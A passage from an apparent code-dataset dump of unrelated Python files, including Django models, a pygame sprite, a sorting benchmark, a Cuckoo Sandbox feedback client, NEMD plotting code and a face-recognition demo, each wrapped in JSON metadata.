max(parm.result['FusionNet']['FusionKD'])\n\nprint(f\"FusionKD: {mean_std(FusionKD)}\")\n\n#%%\nFusionMLKD = np.empty([num])\nfor i in range(num):\n parm = Parm[i]\n FusionMLKD[i] = max(parm.result['FusionNet']['FusionMLKD'])\n\nprint(f\"FusionMLKD: {mean_std(FusionMLKD)}\")\n\n#%%\nFusionMLKD2 = np.empty([num])\nfor i in range(num):\n parm = Parm[i]\n FusionMLKD2[i] = max(parm.result['FusionNet']['FusionMLKD2'])\n\nprint(f\"FusionMLKD2: {mean_std(FusionMLKD2)}\")\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Experiments/Experiments8_paper/get_result9.py","file_name":"get_result9.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385551586","text":"from django.db import models\n\n# Create your models here.\n\nclass Employees(models.Model):\n user = models.CharField('Сотрудник:', max_length=300)\n email = models.EmailField('Email сотрудника:', default=None,blank=True, null=True)\n is_active_status = models.BooleanField('Активен',default=True,)\n\n def __str__(self):\n return '%s' % self.user\n\n class Meta:\n verbose_name = 'Сотрудник'\n verbose_name_plural = 'Сотрудники'\n\n\nclass Equipment(models.Model):\n inventory_number = models.IntegerField('Инвентарный номер:')\n user = models.ForeignKey('Employees', blank=True, null=True, default=\"Склад\")\n name = models.TextField('Оборудование:',max_length=300)\n type = models.ForeignKey('Type', blank=True, 
null=True,)\n is_active = models.BooleanField('Активен:',default=True,)\n is_license = models.BooleanField('Лицензия', default=True)\n list_software = models.CharField('Список ПО', blank=True, null=True,max_length=500)\n\n def __str__(self):\n return '%s' % self.name\n\n class Meta:\n verbose_name = 'Оборудование'\n verbose_name_plural = 'Обрудование'\n\nclass Type(models.Model):\n type = models.CharField('Тип', max_length=255)\n\n def __str__(self):\n return '%s' % self.type\n\n class Meta:\n verbose_name = 'Тип оборудования'\n verbose_name_plural = 'Типы оборудования'\n\n\n\n\n","sub_path":"Inventory/inventory_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"592015842","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclass Zombie(Sprite):\n \"\"\"A class to represent a single zombie in the fleet.\"\"\"\n\n def __init__(self, ai_game):\n \"\"\"Initialize the zombie and set its starting position.\"\"\"\n super().__init__()\n self.screen = ai_game.screen\n self.settings = ai_game.settings\n\n #load the zombie image and set its recct attribute\n self.image = pygame.image.load('images/zombie.bmp')\n self.rect = self.image.get_rect()\n\n #Start each new zombie near the top left of the screen.\n self.rect.x = self.rect.width\n self.rect.y = self.rect.height\n\n #Store the zombie's exact horizontal position\n self.x = float(self.rect.x)\n\n def check_edges(self):\n \"\"\"Return True if zombie is at edge of screen.\"\"\"\n screen_rect = self.screen.get_rect()\n if self.rect.right >= screen_rect.right or self.rect.left <=0:\n return True\n\n def update(self):\n \"\"\"Move the zombie right of left\"\"\"\n self.x += (self.settings.zombie_speed * self.settings.fleet_direction)\n self.rect.x = self.x\n ","sub_path":"Zominion-main/zombie.py","file_name":"zombie.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490210854","text":"#hırsıza çalacak eşya seçimi\nclass Item(object):\n def __init__(self,n,v,w,v_w):\n self.name=n\n self.value=v\n self.weight=w\n self.v_w=v_w\n def __repr__(self):\n return \"Adı: %s Değeri: %d Ağırlığı: %d\"%(self.name,self.value,self.weight)\ndef get_items():\n items=[]\n items.append(Item('Clock',175,10,17.5))\n items.append(Item('Painting',90,9,10))\n items.append(Item('Radio',20,4,5))\n items.append(Item('Vase',50,2,25))\n items.append(Item('Book',10,1,1))\n items.append(Item('Computer',200,20,10))\n return items\n\ndef print_items(items):\n for item in items:\n print(item.name,item.value)\n\ndef sort_items(items):\n return sorted(items,key=lambda Item:Item.value,reverse=True)\n\ndef test():\n items=get_items()\n print_items(items)\n print(\"Sorted Items\")\n items=sort_items(items)\n print_items(items)\n\ndef hırsızList(items,maxWeight):\n result=[]\n totalValue,totalWeight=0,0\n for i in range(len(items)):\n if(totalWeight+items[i].weight<=maxWeight):\n result.append(items[i])\n totalWeight=totalWeight+items[i].weight\n totalValue=totalValue+items[i].value\n return (result,totalValue)\n\ndef print_result(items2):\n for item in items2[0]:\n print(item.name)\n 
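# items2[1] holds the total value of the selected items\n    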
print(items2[1])\ntest()\nItem1=get_items()\nItem2=hırsızList(Item1,20)\nprint_result(Item2)\n","sub_path":"6.Hafta-1.Ders.py","file_name":"6.Hafta-1.Ders.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"238159909","text":"import sys, os, time\nfrom datetime import datetime\nfrom pathlib import Path\nfrom model.sort import sortMethodsSet\nfrom utils.csv import readFile, writeFile\nfrom model.register import Register\n\n# Pseudo-code\n# procedure main(args)\n#     sort ← selectAlgorithm(args)\n#     inputName ← parseInputFileName(args)\n#     outputName ← parseOutputFileName(args)\n#     A ← readCsv(inputName)\n#     initTime ← getCpuTime\n#     sort(A)\n#     finishTime ← getCpuTime\n#     writeCsv(A, outputName)\n#     reportTime(A, initTime, finishTime)\n# end procedure\n\nalgorithms = sortMethodsSet # set of functions, imported from the \"sort.py\" module\n\ndef getTime():\n    return time.time() * 1000\n#\n\n\"\"\"\nRead the .csv and return a list of Registers\n\"\"\"\ndef getRegisters(path):\n    listCSV = readFile(path, True)\n    registers = []\n    for line in listCSV: \n        newRegister = Register(line[0], line[1], line[2], line[3], line[4], line[5])\n        registers.append(newRegister)\n    #\n    return registers\n#\n\ndef getFiles(path):\n    p = Path(path)\n    files = os.listdir(p)\n    return files\n#\n\n\"\"\"\nRecord a result in the logs\n\"\"\"\ndef updateLog(algorithm, n, time):\n    writeFile(\"results.csv\", [str(datetime.now()), algorithm, str(n), str(time)])\n    # print(algorithm, str(n)+\" records\", str(time)+\"ms\")\n#\n\n\"\"\"\nComparison function that we pass to the sorting methods\n\"\"\"\ndef compareByUid(a, b):\n    if a.uid > b.uid: # if a > b, return 1\n        return 1\n    elif a.uid == b.uid: # if equal, return 0\n        return 0\n    else: # if a < b, return -1\n        return -1\n    #\n#\n\n\"\"\" Run ONE test, for ONE algorithm, on ONE set of files \"\"\"\ndef runTest(sort, file):\n    registers = getRegisters(file)\n    start = getTime()\n    sort(registers, compareByUid)\n    end = getTime()\n    return registers, start, end\n#\n\ndef main(args):\n    # registers = getRegisters(\"data/data_10e0.csv\")\n    # registers = [10, 56, 2, 34, 12, 9, 3, 43, 11, 6]\n    # registers = [10, 56, 2, 34, 12, 9, 3, 43, 11, 6]\n    \n    if args[\"algIdentifier\"] in algorithms.keys():\n        print(\"Running\", args[\"algIdentifier\"])\n        sort = algorithms[args[\"algIdentifier\"]]\n        registers, startTime, endTime = runTest(sort, args[\"inputFile\"])\n        updateLog(args[\"algIdentifier\"], len(registers), endTime-startTime)\n        \n        for reg in registers:\n            print(str(reg.uid))\n        #\n    #\n\n    if args[\"algIdentifier\"] == \"all\":\n        for alg in algorithms.keys():\n            sort = algorithms[alg]\n            for fileName in getFiles(args[\"directory\"]):\n                for i in range(0, 5):\n                    print(\"Running\", alg, fileName)\n                    registers, startTime, endTime = runTest(sort, args[\"directory\"]+\"/\"+fileName)\n                    updateLog(alg, len(registers), endTime-startTime)\n                #\n            #\n        #\n    #\n    \n    return\n#\n\nif __name__ == \"__main__\":\n    # Default values\n    args = {}\n\n    # Update args with user input\n    lenArgs = len(sys.argv)\n    \n    if lenArgs >= 2:\n        args[\"algIdentifier\"] = str(sys.argv[1]) # take the first parameter passed on the terminal. 
Ex: python main.py insertsort\n #\n\n if \"-d\" in sys.argv:\n dirIndex = sys.argv.index(\"-d\") + 1\n args[\"directory\"] = str(sys.argv[dirIndex])\n else:\n args[\"directory\"] = \"data\"\n #\n\n if \"-i\" in sys.argv:\n fileIndex = sys.argv.index(\"-i\") + 1\n args[\"inputFile\"] = str(sys.argv[fileIndex])\n #\n \n main(args)\n#\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69331975","text":"#! /usr/bin/env python\n\nimport json\nimport sys\nfrom collections import Counter\nfrom jinja2 import *\n\n# Load 101wiki into memory\n\nwiki = json.loads(open(sys.argv[1], 'r').read())['wiki']\n#wiki = json.loads(open('wiki.json', 'r').read())['wiki']\n\n\n# Write .json and .html file -- the latter as a tag cloud\ndef writeFiles(counts, label, prefix):\n\n # Write frequency map to JSON\n jsonFile = open(label + '.json', 'w')\n jsonFile.write(json.dumps(counts, indent=4))\n\n # Prepare for buckets of scaling\n # Inspired by http://stackoverflow.com/questions/3180779/html-tag-cloud-in-python\n #step = max(counts.values()) / 6\n\n #counts = sorted(counts.items(), key=lambda x: x[1], reverse=True)\n \n #loader = FileSystemLoader('.')\n #env = Environment(loader=loader)\n #template = env.get_template('tagcloud.json')\n #open(label + '.json', 'w').write(template.render({\n # 'title': label,\n # 'counts': counts,\n # 'step': step,\n # 'root': 'http://101companies.org/wiki/' + prefix\n #}))\n \n ## Apply scaling and write HTML\n #htmlFile = open(label + '.html', 'w')\n #htmlFile.write('\\n')\n #htmlFile.write('\\n')\n #htmlFile.write('\\n')\n #htmlFile.write(' ' + label + '\\n')\n #htmlFile.write(' \\n')\n #htmlFile.write('\\n')\n #htmlFile.write('\\n')\n\n #print counts\n\n \n #for tag, count in counts:\n # css = count / step \n # htmlFile.write('%s\\n' % (root, tag, css, tag),)\n\n #htmlFile.write('\\n')\n #htmlFile.write('\\n')\n #htmlFile.close()\n\npages = wiki['pages']\n\ncontributions = filter(lambda p: \"Contribution\" == p.get('p', ''), pages)\n#contributions = [p['page'] for p in contributions ]\n\nuses = [p.get('uses', []) for p in contributions]\nuses = [p for use in uses for p in use]\n\nuses = filter(lambda u: u['p'] == 'Language', uses)\n\nuses = [use['n'].replace('_', ' ') for use in uses]\n\nlcounts = Counter(uses)\n\nuses = [p.get('uses', []) for p in contributions]\nuses = [p for use in uses for p in use]\n\nuses = filter(lambda u: u['p'] == 'Technology', uses)\n\nuses = [use['n'].replace('_', ' ') for use in uses]\n\ntcounts = dict(Counter(uses))\n\n# features\n\nimplements = map(lambda c: c.get('implements', []), contributions)\nimplements = reduce(lambda a, b: a+b, implements)\n\nfeatures = filter(lambda o: o['p'] == 'Feature', implements)\nfeatures = map(lambda o: o['n'], features)\n\nfeatures = [f.replace('_', ' ') for f in features]\n\nfcounts = dict(Counter(features))\n\n#contributors\n\ndevelopedBy = map(lambda c: c.get('developedBy', []), contributions)\ndevelopedBy = reduce(lambda a, b: a+b, developedBy)\n\ndevelopedBy = filter(lambda o: o['p'] == 'Contributor', developedBy)\ndevelopedBy = map(lambda o: o['n'], developedBy)\n\ndevelopedBy = filter(lambda n: n is not None, developedBy)\n\ndevelopedBy = [d.replace('_', ' ') for d in developedBy]\n#developedBy = [ d.decode('utf8') for d in developedBy]\n\nccounts = dict(Counter(developedBy))\n\nwriteFiles(lcounts, 'languages', 'Language')\nwriteFiles(tcounts, 'technologies', 
'Technology')\nwriteFiles(fcounts, 'features', 'Feature')\nwriteFiles(ccounts, 'contributors', 'Contributors')\n","sub_path":"101worker/modules/moretagclouds/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"242312010","text":"import csv\nimport emoji\nfrom joblib import Parallel, delayed\nimport multiprocessing\n\n\ndef removeEmoji(line):\n item = line\n for key in emoji.UNICODE_EMOJI:\n item = item.replace(key,emoji.UNICODE_EMOJI[key].replace(':',\" \"))\n return item\n\ntext = open(\"twcs.csv\", \"r\")\n\nx = open(\"output.csv\",\"w\")\nnum_cores = multiprocessing.cpu_count()\n\nresults = Parallel(n_jobs=num_cores)(delayed(removeEmoji)(i) for i in text)\n\n\nx.writelines(results)\n\nx.close()\n\n\n\n\n","sub_path":"scripts/EmojiTranslate.py","file_name":"EmojiTranslate.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"495487574","text":"\"\"\"\n# Copyright (c) 2019 Wang Hanqin\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\n\nimport torch.nn as nn\nfrom .utils import standardize\n\nclass Conv_Block(nn.Module):\n def __init__(self, input, filters, kernel_sizes, stride, padding, groups=1, name='', dilation=1,\n bias=True, activation=nn.ReLU(), batch_norm=None, dropout=0, transpose=False):\n super().__init__()\n self.layers = conv_block(input, filters, kernel_sizes, stride, padding, groups, name, dilation,\n bias, activation, batch_norm, dropout, transpose)\n\n def forward(self, x):\n return self.layers.forward(x)\n \n\ndef conv_block(input, filters, kernel_sizes, stride, padding, groups=1, name='', dilation=1,\n bias=True, activation=nn.ReLU(), batch_norm=None, dropout=0, transpose=False):\n \"\"\"\n Create a convolutional block with several layers\n :param input: input data channels\n :param filters: int or list\n :param kernel_sizes: int or list\n :param stride: int or list\n :param padding: int or list\n :param groups: int or list, default 1\n :param name:\n :param activation:\n :param batch_norm:\n :return: nn.Sequential Object\n \"\"\"\n filters = [input] + [filters] if type(filters) is not list else [input] + filters\n assert_length = len(filters) - 1\n kernel_sizes = standardize(kernel_sizes, assert_length)\n stride = standardize(stride, assert_length)\n padding = standardize(padding, assert_length)\n groups = standardize(groups, assert_length)\n dilation = standardize(dilation, assert_length)\n bias = standardize(bias, assert_length)\n activation = standardize(activation, assert_length)\n batch_norm = standardize(batch_norm, assert_length)\n dropout = standardize(dropout, assert_length)\n transpose = standardize(transpose, assert_length)\n\n modules = nn.Sequential()\n for i in range(len(filters) - 1):\n if transpose[i]:\n modules.add_module(\"convT_\" + name + \"_\" + str(i),\n nn.ConvTranspose2d(in_channels=filters[i], out_channels=filters[i 
+ 1],\n kernel_size=kernel_sizes[i], stride=stride[i], padding=padding[i],\n dilation=dilation[i], groups=groups[i], bias=bias[i]))\n else:\n modules.add_module(\"conv_\" + name + \"_\" + str(i),\n nn.Conv2d(in_channels=filters[i], out_channels=filters[i + 1],\n kernel_size=kernel_sizes[i], stride=stride[i], padding=padding[i],\n dilation=dilation[i], groups=groups[i], bias=bias[i]))\n\n if batch_norm[i]:\n modules.add_module(\"bn_\" + name + \"_\" + str(i), batch_norm[i](filters[i + 1]))\n if activation[i]:\n modules.add_module(\"act_\" + name + \"_\" + str(i), activation[i])\n if dropout[i] > 0:\n modules.add_module(\"drop_\" + name + \"_\" + str(i), nn.Dropout2d(dropout[i]))\n return modules","sub_path":"networks/blocks/conv_block.py","file_name":"conv_block.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248240162","text":"# Copyright (C) 2016 Cuckoo Foundation.\n# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org\n# See the file 'docs/LICENSE' for copying permission.\n\nimport base64\nimport json\nimport logging\nimport os\nimport requests\nimport traceback\n\nfrom cuckoo.misc import cwd\nfrom django.core.validators import validate_email, ValidationError\nfrom django.template import TemplateSyntaxError, TemplateDoesNotExist\nfrom django.conf import settings\nfrom django.http import Http404\n\nfrom cuckoo.core.report import AbstractReport\nfrom cuckoo.common.config import Config, config\nfrom cuckoo.misc import version\nfrom cuckoo.web.controllers.analysis.export.export import ExportController\n\nfrom cuckoo.common.exceptions import CuckooFeedbackError\n\nlog = logging.getLogger(__name__)\n\nclass CuckooFeedback(object):\n \"\"\"Contacts Cuckoo HQ with feedback + optional analysis dump\"\"\"\n\n def __init__(self):\n self.endpoint = \"https://cuckoo.sh/feedback/api/submit/\"\n self.mongo = settings.MONGO\n\n def send_exception(self, exception, request=None):\n \"\"\"\n To be used during exception handling.\n @param exception: The exception class\n @param request: Django request object\n @return:\n \"\"\"\n feedback = CuckooFeedbackObject(was_automated=True)\n feedback.message = \"Exception `%s` encountered\" % str(type(exception))\n\n if isinstance(exception, (CuckooFeedbackError, Http404)):\n return\n elif isinstance(exception, (TemplateDoesNotExist,\n TemplateSyntaxError)):\n feedback.add_error(\"Django templating error\")\n\n feedback.add_error(traceback.format_exc())\n feedback_options = {\n \"include_analysis\": False,\n \"include_json_report\": False,\n \"include_memdump\": False,\n \"include_config\": True\n }\n\n if request:\n if hasattr(request, \"resolver_match\") and request.resolver_match:\n if request.method == \"POST\" and request.is_ajax():\n request_kwargs = json.loads(request.body)\n else:\n request_kwargs = request.resolver_match.kwargs\n elif request.method == \"GET\":\n request_kwargs = request.GET\n elif request.method == \"POST\":\n request_kwargs = request.POST\n else:\n request_kwargs = None\n\n if request_kwargs:\n if \"task_id\" in request_kwargs:\n task_id = int(request_kwargs[\"task_id\"])\n elif \"analysis_id\" in request_kwargs:\n task_id = int(request_kwargs[\"analysis_id\"])\n else:\n task_id = None\n\n if task_id:\n feedback_options[\"analysis_id\"] = task_id\n feedback_options[\"include_analysis\"] = True\n feedback_options[\"include_json_report\"] = True\n feedback_options[\"include_memdump\"] = False\n\n if 
feedback_options[\"include_json_report\"]:\n feedback.include_report(analysis_id=feedback_options[\"analysis_id\"])\n\n if feedback_options[\"include_analysis\"]:\n feedback.include_analysis(include_memdump=feedback_options[\"include_memdump\"])\n\n try:\n feedback.validate()\n except (CuckooFeedbackError, ValidationError) as ex:\n raise CuckooFeedbackError(\"Could not validate feedback object: %s\" % str(ex))\n\n return self._send(feedback)\n\n def send(self, analysis_id=None, name=\"\", email=\"\", message=\"\", company=\"\",\n include_json_report=False, include_analysis=False,\n include_memdump=False, was_automated=False):\n if not config(\"cuckoo:feedback:enabled\"):\n raise CuckooFeedbackError(\n \"Feedback not enabled in config or feedback options missing\"\n )\n\n feedback = CuckooFeedbackObject(\n name=name,\n company=company,\n email=email,\n message=message,\n was_automated=was_automated\n )\n\n if include_json_report:\n if not analysis_id or not isinstance(analysis_id, int):\n raise CuckooFeedbackError(\"analysis_id cannot be empty while including the json_report\")\n\n feedback.include_report(analysis_id=analysis_id)\n\n if include_analysis:\n feedback.include_analysis(include_memdump=include_memdump)\n\n feedback_id = self._send(feedback)\n return feedback_id\n\n def _send(self, feedback):\n try:\n feedback.validate()\n except CuckooFeedbackError as ex:\n raise CuckooFeedbackError(\"Could not validate feedback object: %s\" % str(ex))\n\n feedback = feedback.to_dict()\n headers = {\n \"Content-type\": \"application/json\",\n \"Accept\": \"text/plain\",\n \"User-Agent\": \"Cuckoo %s\" % version\n }\n\n try:\n resp = requests.post(\n url=self.endpoint,\n json=feedback,\n headers=headers\n )\n if not resp.status_code == 200:\n raise CuckooFeedbackError(\"the remote server did not respond correctly\")\n\n resp = json.loads(resp.content)\n if \"status\" not in resp or not resp[\"status\"]:\n raise CuckooFeedbackError(resp[\"message\"])\n\n return resp[\"feedback_id\"]\n except requests.exceptions.RequestException as e:\n msg = \"Invalid response from Cuckoo feedback server: %s\", str(e)\n log.error(msg)\n raise CuckooFeedbackError(msg)\n except CuckooFeedbackError as e:\n msg = \"Cuckoo feedback error while sending: %s\", str(e)\n log.error(msg)\n raise CuckooFeedbackError(msg)\n except Exception as e:\n msg = \"Unknown feedback error while sending: %s\" % str(e)\n log.error(msg)\n raise CuckooFeedbackError(msg)\n\nclass CuckooFeedbackObject:\n def __init__(self, message=None, email=None, name=None, company=None, was_automated=False):\n self.was_automated = was_automated\n self.message = message\n self.errors = []\n self.contact = {\n \"name\": config(\"cuckoo:feedback:name\"),\n \"company\": config(\"cuckoo:feedback:company\"),\n \"email\": config(\"cuckoo:feedback:email\"),\n }\n self.export = None\n self.report_info = {}\n self.report = None\n\n def include_report(self, analysis_id):\n report = AbstractReport(analysis_id=analysis_id)\n if report.analysis_errors:\n for error in report.analysis_errors:\n self.add_error(error)\n\n # attach additional analysis information\n if \"file\" in report.analysis_target:\n self.report_info[\"file\"] = {\n k: v for k, v in report.analysis_target[\"file\"].items()\n if isinstance(v, (str, unicode, int, float))\n }\n self.report_info[\"file\"][\"task_id\"] = analysis_id\n else:\n self.report_info[\"url\"] = {\"url\": report.analysis_target[\"url\"]}\n self.report_info[\"url\"][\"task_id\"] = analysis_id\n\n self.report_info[\"analysis_id\"] = 
report.analysis_id\n self.report_info[\"analysis_path\"] = report.analysis_info[\"analysis_path\"]\n self.report = report\n\n def include_analysis(self, include_memdump=False):\n if not self.report.src:\n raise CuckooFeedbackError(\n \"Report must first be included in order to include the analysis\"\n )\n\n analysis_path = self.report.analysis_info[\"analysis_path\"]\n taken_dirs, taken_files = ExportController.get_files(analysis_path)\n\n if not include_memdump:\n taken_dirs = [z for z in taken_dirs if z[0] != \"memory\"]\n\n export = ExportController.create(task_id=self.report.analysis_id,\n taken_dirs=taken_dirs,\n taken_files=taken_files,\n report=self.report.src)\n export.seek(0)\n self.export = base64.b64encode(export.read())\n\n def add_error(self, error):\n self.errors.append(error)\n\n def validate(self):\n for expect in [\"email\", \"name\"]:\n if expect not in self.contact or not self.contact[expect]:\n raise CuckooFeedbackError(\"Missing contact information: %s\" % expect)\n\n validate_email(self.contact[\"email\"])\n\n if not self.message:\n raise CuckooFeedbackError(\"Missing feedback message\")\n\n return True\n\n def to_dict(self):\n data = {\n \"errors\": self.errors,\n \"contact\": self.contact,\n \"automated\": self.was_automated,\n \"message\": self.message,\n \"cuckoo\": {\n \"cwd\": cwd(),\n \"app\": os.environ.get(\"CUCKOO_APP\"),\n }\n }\n\n if self.report:\n data[\"analysis_info\"] = self.report_info\n\n if self.export:\n data[\"export\"] = self.export\n\n data[\"cfg\"] = Config.from_confdir(cwd(\"conf\"), sanitize=True)\n\n return data\n","sub_path":"cuckoo/core/feedback.py","file_name":"feedback.py","file_ext":"py","file_size_in_byte":9253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365620404","text":"from Aurora.settings import BASE_DIR\n\nimport json\nimport os\nimport sys\nimport glob\n\ndef run():\n dict_name = sys.argv[0]\n dict_file_path = os.path.join(BASE_DIR, 'Aurora/data/dictionary/'+dict_name+'/dictionary.json')\n data = json.load(open(dict_file_path))\n data = {k.lower(): v for k, v in data.items()}\n\n chunks = {}\n chunk_indexes = []\n \n print('Creating chunk data from Dictionary')\n for word in data:\n if not word.isalpha():\n continue\n else:\n chunk_index = word[:1]\n chunk_indexes.append(chunk_index)\n if not chunk_index in chunks:\n chunks[chunk_index] = {}\n chunks[chunk_index][word] = data[word]\n\n dict_dir = os.path.join(BASE_DIR, 'Aurora/data/dictionary/'+dict_name)\n chunks_dir = os.path.join(dict_dir, 'chunks')\n print('Deleting existing files from '+chunks_dir)\n files = glob.glob(chunks_dir+'/*')\n for f in files:\n os.remove(f)\n \n print('Creating new files in '+chunks_dir+'\\n')\n for chunk_index in chunks:\n chunk_data = chunks[chunk_index]\n output_file_path = os.path.join(chunks_dir, ''+chunk_index+'.json')\n with open(output_file_path, 'w') as file:\n print('Writing to '+output_file_path+', words count: '+str(len(chunk_data)))\n file.write(json.dumps(chunk_data))\n\nif __name__ == '__main__':\n run()\n","sub_path":"Aurora/scripts/dictionary/split_dictionary_into_chunks.py","file_name":"split_dictionary_into_chunks.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230892696","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom nemd.mpl.initialize import (set_matplot, set_axis, set_legend)\n 
\nfrom nemd.structure.gic import get_layer_information\n\ndef _set_temperature_profile(fontsize=None, fig_width=None, aspect=None,\n xunit=None, xlabel=\"Position\", ylable=\"Temperature (K)\", nfigs=1):\n set_matplot(fontsize=fontsize)\n fig = plt.figure(figsize=(fig_width, aspect*fig_width))\n plt.subplots_adjust(left=0.20, bottom=0.17, right=0.98,\n top=0.98, wspace=0, hspace=0.25)\n \n axes = []\n for ifig in range(nfigs):\n axes.append(plt.subplot(nfigs,1,ifig+1))\n \n if xunit == 'nm':\n _xunit = 'nm'\n else:\n _xunit = \"$\\\\AA$\"\n axes[0].set_xlabel('Position (%s)'%(_xunit))\n axes[0].set_ylabel('Temperature (K)')\n return fig, axes\n\ndef plot_temperature_profile_atom(\n dumpfile, atoms=None, lmpinput='nemd.dump', iaxis=2,\n figname=None, outfile=None,\n xunit='nm', log=None,\n dpi=300, fontsize=7, fig_width=2.8, aspect=0.9, lw=0.3, ms=5.0\n ):\n ##groups4plot=None, \n \"\"\" Plot temperature for each atom or segment. Use original atomic positions\n (atoms) and temperatures in \"dumpfile\". Note that LAMMPS use angstrom as the\n unit of length.\n \"\"\"\n ## Read temperatures\n from nemd.file import get_averaged_temperatures_atom\n temp_ave, nstructures = \\\n get_averaged_temperatures_atom(dumpfile, natoms=len(atoms))\n \n ## Read group IDs\n from nemd.file import read_group_ids\n ids = read_group_ids(lmpinput)\n\n ##\n groups4plot = []\n for name in ids.keys():\n if name is not 'fix':\n groups4plot.append(name)\n\n ##\n temps = {}\n for group in groups4plot:\n idx = np.arange(ids[group][0]-1, ids[group][1])\n n = len(idx)\n temps[group] = np.zeros((n, 3))\n temps[group][:,0] = np.ones(n)\n temps[group][:,1] = atoms.get_positions()[idx,iaxis]\n temps[group][:,2] = temp_ave[idx]\n\n if outfile is not None:\n from nemd.file import write_nemd_temperatures\n write_nemd_temperatures(outfile, temps,\n unit_length=xunit,\n nstructures=nstructures)\n \n ## cross-sectional area\n cross = 1.\n for j in range(3):\n if j != iaxis:\n cross *= atoms.cell[j,j] # A^2\n ##\n plot_temperature_profile(temps,\n xunit=xunit,\n figname=figname,\n log=log,\n cross_section=cross\n )\n\ndef plot_temperature_profile(temps, log=None,\n cross_section=None,\n xunit='nm', group4plot=None,\n figname=None, plot_layer=True,\n dpi=300, fontsize=6, lw=0.6, ms=2.0\n ):\n \"\"\"\n Parameters\n ---------------\n temps : dict of ndarray\n temps['hot'][n,3] : (number of atoms, position[A], temperature[K])\n log : DataFrame object\n cross_section : unit=[A^2]\n \"\"\"\n ##\n if log is not None:\n nfigs = 2\n fig_width = 2.5\n aspect = 1.3\n else:\n nfigs = 1\n fig_width = 2.3\n aspect = 0.9\n \n ## Setting for the figure\n fig, axes = _set_temperature_profile(\n fontsize=fontsize, fig_width=fig_width, aspect=aspect, xunit=xunit,\n nfigs=nfigs)\n \n ## plot energy\n if log is not None:\n from tips.plot import plot_energy\n heat = plot_energy(axes[1], log, cross_section=cross_section) # Watt\n \n ## unit\n if xunit == 'nm':\n xmod = 0.1\n else:\n xmod = 1.0\n \n ## plot\n for i, group in enumerate(temps.keys()):\n if group == 'hot':\n col = 'red'\n marker = '^'\n elif group == 'cold':\n col = 'blue'\n marker = 'v'\n elif 'mid' in group:\n col = 'purple'\n marker = 'o'\n else:\n continue\n \n ##\n if plot_layer:\n zpos, idx_layers = get_layer_information(temps[group][:,1], gap=1.5)\n temp_ave = np.zeros(len(zpos))\n for il in range(len(zpos)):\n temp_ave[il] = np.average(temps[group][idx_layers[il],2])\n else:\n zpos = temps[group][:,1]\n temp_ave = temps[group][:,2]\n\n axes[0].scatter(\n zpos * xmod,\n temp_ave,\n 
s=ms, marker=marker, linewidth=lw,\n edgecolor=col,\n facecolor='None', label=group)\n \n set_axis(axes[0])\n set_legend(axes[0], alpha=0.5, fs=6)\n \n ## save a figure\n if figname is not None:\n fig.savefig(figname, dpi=dpi, bbox_inches='tight')\n print(\" Output\", figname)\n \n return fig\n\n","sub_path":"nemd/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"483842294","text":"import face_recognition\r\nimport numpy as np\r\nfrom PIL import Image, ImageDraw\r\n\r\n \r\nknown_image = face_recognition.load_image_file(\"aditya.jpg\")\r\nencoding = face_recognition.face_encodings(known_image)[0]\r\n\r\n\r\nunknown_image = face_recognition.load_image_file(\"pic.jpg\")\r\n\r\n\r\nface_locations = face_recognition.face_locations(unknown_image)\r\nface_encodings = face_recognition.face_encodings(unknown_image, face_locations)\r\n\r\n\r\npil_image = Image.fromarray(unknown_image)\r\n\r\ndraw = ImageDraw.Draw(pil_image)\r\n\r\nfor (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings): \r\n matches = face_recognition.compare_faces([encoding], face_encoding)\r\n\r\n face_distances = face_recognition.face_distance([encoding], face_encoding)\r\n best_match_index = np.argmin(face_distances)\r\n if matches[best_match_index]:\r\n\r\n draw.rectangle(((left - 20, top - 20), (right + 20, bottom + 20)), outline=(0, 255, 0), width=20)\r\n\r\n\r\ndel draw\r\n\r\n\r\npil_image.show()\r\n","sub_path":"face recognition.py","file_name":"face recognition.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72513209","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport math\nimport time\n\n# 関数群\n## 入力にかかる行列計算用\ndef calc_B_T(dt, theta):\n B_T = 